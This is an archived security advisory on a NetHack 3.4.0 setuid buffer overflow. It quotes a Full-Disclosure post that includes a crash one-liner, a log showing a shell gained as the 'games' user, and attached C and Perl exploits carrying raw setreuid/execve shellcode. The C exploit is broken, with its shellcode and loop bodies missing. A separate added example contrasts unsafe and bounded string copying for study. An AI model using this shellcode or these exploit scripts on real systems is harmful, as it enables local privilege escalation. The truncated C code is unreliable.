Category:   Application (Game)  >   NetHack Vendors:
NetHack Game Buffer Overflow Lets Local Users Obtain Additional Privileges
SecurityTracker Alert ID:  1006064
CVE Reference:   CVE-2003-0358, CVE-2003-0359
Updated:  Dec 4 2003
Original Entry Date:  Feb 10 2003
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 3.4.0 and prior versions
Description:   A buffer overflow was reported in the NetHack game software. A local user can obtain additional privileges.

It is reported that a local user can supply a specially crafted command string to the nethack binary to trigger a buffer overflow and execute arbitrary code. On some distributions, the software is reportedly installed with set user id (setuid) 'games' privileges. A local user could obtain 'games' user privileges.

A demonstration exploit is provided:

nethack -s `perl -e "print 'A' x 1000"`

Some demonstration exploit code is provided in the Source Message.

Impact:   A local user can obtain 'games' user privileges.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
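The advisory describes a fixed-size buffer overrun by an over-long command-line string handed to a setuid binary. As an added example (not NetHack's code; the buffer size and function names are assumptions), the unchecked copy pattern is shown beside a bounded version that rejects over-long player names instead of overflowing:

```c
/* Added example, not NetHack's source code. Illustrates the bug class in
 * the advisory: a fixed-size buffer filled from a command-line argument
 * without a length check, beside a bounded version that rejects over-long
 * input. NAMEBUF and all function names are assumptions for illustration. */
#include <stdio.h>
#include <string.h>

#define NAMEBUF 32   /* assumed size of the name buffer, not NetHack's value */

/* Unsafe pattern: copies the argument into dst with no bound, so any
 * src of NAMEBUF bytes or more writes past the end of dst. Kept only
 * for contrast; never call it on untrusted input. */
void unsafe_copy_name(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened copy: refuses input that would not fit (including the NUL)
 * and never truncates silently. Returns 1 on success, 0 on rejection. */
int safe_copy_name(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (dstlen == 0 || n >= dstlen)
        return 0;
    memcpy(dst, src, n + 1);
    return 1;
}

/* Front end in the spirit of `-s [playernames]`: validates each name
 * before any lookup. Returns how many names were accepted. */
int accept_player_names(int argc, char **argv)
{
    char name[NAMEBUF];
    int accepted = 0;
    for (int i = 0; i < argc; i++) {
        if (!safe_copy_name(name, sizeof name, argv[i])) {
            fprintf(stderr, "rejected player name of %zu bytes (limit %d)\n",
                    strlen(argv[i]), NAMEBUF - 1);
            continue;
        }
        accepted++;
    }
    return accepted;
}

int main(int argc, char **argv)
{
    printf("%d name(s) accepted\n", accept_player_names(argc - 1, argv + 1));
    return 0;
}
```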

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jun 13 2003 (Debian Issues Fix) NetHack Game Buffer Overflow Lets Local Users Obtain Additional Privileges
Debian has released a fix.

 Source Message Contents

Subject:  [Full-Disclosure] #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow



/usr/games/lib/nethackdir/nethack - LOCALLY EXPLOITABLE BUFFER

try th1s: nethack -s `perl -e "print 'A' x 1000"`

nethack.RPM package for redhat 8 is installed SETUID GAMES!@)~*

ther pre compiled b1nz for come for Amiga, Atari, Linux, Mac, Msdos
OS/2, Windows. br0 u can even dl source and own it on *BSD, System V,
Solaris, HP-UX, BeOS and VMS! How tight is th1s w4r3z y0

thatz right, we can snatch games prives.. this are highly sought
after privz.. with th1s we can do stuff like.. writing our own highscore
files & such.. use it to impress your friends.. u will be the ULTIMATE

ch3ck th1s:

[tsao@c:\ tmp]$ ./n 224 400
shellcode at 159->220
Using bffff6d8

Cannot find any current entries for )���۳

Call is: nethack -s [-v] [-role] [maxrank] [playernames]
sh-2.05b$ id
uid=12(games) gid=500(tsao) groups=500(tsao)

to all the people who think this is lame: ANY PRIVILEGE ESCALATION IS

greets: #!IC@EFNET / d4yj4y(lub yew bro.. thnx for help with C code)
greets: The-Rev - that regedit question was da b0mb. bizz0mb.
dis: #phrack@EFNET / the_ut -- I told you guys i was skilled & could code.

Attached is a C & PERL exploit, this is incase you do not have a C
compiler. I cover all the bases for u.

stay tuned for ftpd/apache warez, im pumping out more 0day than the_ut pumpz out
lame questionz to test my skillz..

p.s [tsao@c:\ tmp]# ssh -l tsao4sh0 -p 31337
    [root@phc /]# WHOZ THE UNIX TERRORIST NOW ?

p.p.s im gonna drop 7350 warez soon, year of the leak bitchez.

p.p.p.s squashing bugz is fun!

attached: nethacker.c /

<cut-me-here!!!!!!!! nethacker.c cut-me-here!!!!!!!>
        tsao@efnet #!IC@efnet 2k3
        thnx to aleph1 for execve shellcode &
        davidicke for setreuid() shellcode

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char code[] =


unsigned long sp(void) {
   __asm__("movl %esp,%eax");

int main(int argc, char **argv) {
     char *p;
     int i, off;

     p = malloc(sizeof(char) * atoi(argv[1]));

     off = 220 - strlen(code);
     printf("shellcode at %d->%d\n",off,off+strlen(code));
       p[i+off] = code[i];

     *(long *) &p[220] = sp() - atoi(argv[2]);
     printf("Using %x\n",sp() - atoi(argv[2]));


<eof-nethacker.c!!!!!!! eof-nethacker.c!!!!!!>

<cut-me-here !!!!!! cut-me-here!!!!>

#!/usr/bin/perl -w
# tsao@efnet #!IC@efnet 2k3
# thnx to aleph1 for execve shellcode
# davidicke for setreuid() shellcode

$sc .= "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\x31\xdb";
$sc .= "\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e";
$sc .= "\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12";
$sc .= "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62";
$sc .=  "\x69\x6e\x2f\x73\x68\x01";

for ($i = 0; $i < (224 - (length($sc)) - 4); $i++) {
    $buf .= "\x90";

$buf .= $sc;
$buf .= "\xd2\xf8\xff\xbf";

exec("/usr/games/lib/nethackdir/nethack -s '$buf'");


tsao@efnet #!IC@efnet 2k3
tsao - owning ^ x.25 like none other.. fuq u jj

